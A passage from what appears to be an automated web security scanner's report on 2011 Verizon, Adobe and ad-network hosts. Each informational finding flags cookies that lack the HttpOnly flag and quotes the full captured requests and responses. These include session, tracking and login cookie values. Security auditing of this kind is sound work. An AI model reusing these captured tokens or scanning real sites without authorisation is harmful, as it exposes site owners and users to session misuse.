The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITORID=1597650297; Domain=.verizon.com; Expires=Fri, 05-Sep-2014 16:09:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248 HTTP/1.1
Host: forums.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

10.68. http://g-pixel.invitemedia.com/gmatcher previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/gmatcher

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; Domain=invitemedia.com; expires=Tue, 04-Sep-2012 22:14:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: segments_p1="eJzjYuFY1sjMxcIx9w+IXHiHEUjufg0ij31n4mLmWJsHZHZ2MHNxcjwIF7gz5/BnFqDADrCK3uNMQPLMexB7H1jkywdGoJ7nuUDmzo8g5j8OIPM0WMXG9SwAmsIfSg=="; exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM1M119; uid=776b70d9-5df4-4d1b-98af-982dd1709cac; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 05-Sep-2011 22:14:21 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; Domain=invitemedia.com; expires=Tue, 04-Sep-2012 22:14:41 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.69. http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://get.adobe.com
Path:	/cfusion/search/buddy/searchbuddy.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DylanApp-BigIP=1447851018.27680.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/search/buddy/searchbuddy.cfm?pre=xs&s=get:flashplayer&loc=en_us HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://get.adobe.com/flashplayer/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SETTINGS.LOCALE=en%5Fus; storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1315279224659_929552","ru":"http://phones.verizonwireless.com/htc/thunderbolt/","r":"phones.verizonwireless.com","st":"","cp":{"downloads":"get"},"pv":2,"to":3.3,"c":"http://get.adobe.com/flashplayer/","lc":{"d0":{"v":2,"s":true,"e":2}},"cd":0,"sd":0,"f":1315279228499}

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:34 GMT
Server: JRun Web Server
Cache-Control: max-age=1800
Content-Type: text/html; charset=UTF-8
Set-Cookie: DylanApp-BigIP=1447851018.27680.0000; path=/
Content-Length: 32

{"SUGGESTIONS":[],"HUBLETS":[]}

10.70. http://get.adobe.com/flashplayer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://get.adobe.com
Path:	/flashplayer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Wed, 28-Aug-2041 22:20:21 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flashplayer/ HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://phones.verizonwireless.com/htc/thunderbolt/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:20 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Wed, 28-Aug-2041 22:20:21 GMT;path=/cfusion/
Content-Length: 27953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...

10.71. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/js/com/bea/portal/tools/js/Core.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /headlines/js/com/bea/portal/tools/js/Core.jsp HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 83
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; path=/

__BEA.com.bea.portal.tools.js.Core.set('__BEA.request.contextPath', '/headlines')

10.72. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NEWSROOMDOTCOMAPPID=7bSLTlQhs2y2M1zZJrqhtyTDLWGScGvNhMT9hlxzfQnmhhvJsQzr!1136409313; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 1181
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Set-Cookie: NEWSROOMDOTCOMAPPID=7bSLTlQhs2y2M1zZJrqhtyTDLWGScGvNhMT9hlxzfQnmhhvJsQzr!1136409313; path=/

__BEA.com.bea.portal.tools.js.Core.set("__BEA.com.bea.portal.tools.js.Constants", new Object())


__BEA.com.bea.portal.tools.js.Constants.CONTEXT_PATH = '/he
...[SNIP]...

10.73. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383&11095=734384; domain=.interclick.com; expires=Sun, 05-Sep-2021 22:14:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=5d69f842-0719-4c5b-961b-9400c8d4e652 HTTP/1.1
Host: idcs.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: T=1; uid=u=b302c5d5-65f2-40f8-a929-cb62b8ddcae9; sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383; tpd=e20=1315359826890&e90=1313372627004&e50=1315359827084&e100=1313372627366

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383&11095=734384; domain=.interclick.com; expires=Sun, 05-Sep-2021 22:14:39 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 05 Sep 2011 22:14:38 GMT

GIF89a.............!.......,...........D..;

10.74. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACID=optout!; domain=advertising.com; expires=Wed, 04-Sep-2013 22:16:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=7656746518332.511?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:16:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 04-Sep-2013 22:16:10 GMT; path=/
Set-Cookie: F1=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: aceRTB=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 05 Sep 2011 23:16:10 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.75. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=OnUZOBbfB0zjG7ZhrCQcHWgVSKsBdbdxgZAmoZMYi+iBezixglLuHYRxGbUkAfwuRXkR0udBT7qR0/1IzaE9hahBdPixgFbPIsOlGAnq8YQgkZUYT+9B5ydhWmLcIoCxGrA; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
GUID=MTMxNTI2MDg3ODsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: ACID=tX790013123977920032; C2=q62YOBbfC0zjGQQhrCQcHW0uSKsBdbdBGbAmoZgxi+iBeziBGnLuHYRxGwakAfwuRX4q0utBT7qhZB2IzaYWhahBdPiBGjpDAcHvG4EA7xrBOpKPGEIZGa8kffQucX8+5CHCqQsBwB; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; aceRTB=rm%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cam%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cdc%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Can%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Crub%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7C; GUID=MTMxNTEzOTI0MjsxOjE3Mmpta2gxN2cxMHJzOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: https://ad.yieldmanager.com/pixel?id=357067&t=2
Set-Cookie: C2=OnUZOBbfB0zjG7ZhrCQcHWgVSKsBdbdxgZAmoZMYi+iBezixglLuHYRxGbUkAfwuRXkR0udBT7qR0/1IzaE9hahBdPixgFbPIsOlGAnq8YQgkZUYT+9B5ydhWmLcIoCxGrA; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
Set-Cookie: GUID=MTMxNTI2MDg3ODsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 05 Sep 2011 23:14:38 GMT
Content-Length: 0

10.76. https://mblogin.verizonwireless.com/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mblogin.verizonwireless.com
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.77. http://media.verizon.com/media/XmlProxy.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/XmlProxy.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=KQfyhK9qeUc=&H=&I=&J=JxCF029RF/U=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:50 GMT; path=/media

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/XmlProxy.ashx?widget=vzMedia&callback=?&_rand=1315280536004 HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://media.verizon.com/media/widgets/sliderdev/flash/MyVerizonListSliderNoDropDown.swf?version=4&_rand=1315280536005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml
Content-Length: 73898
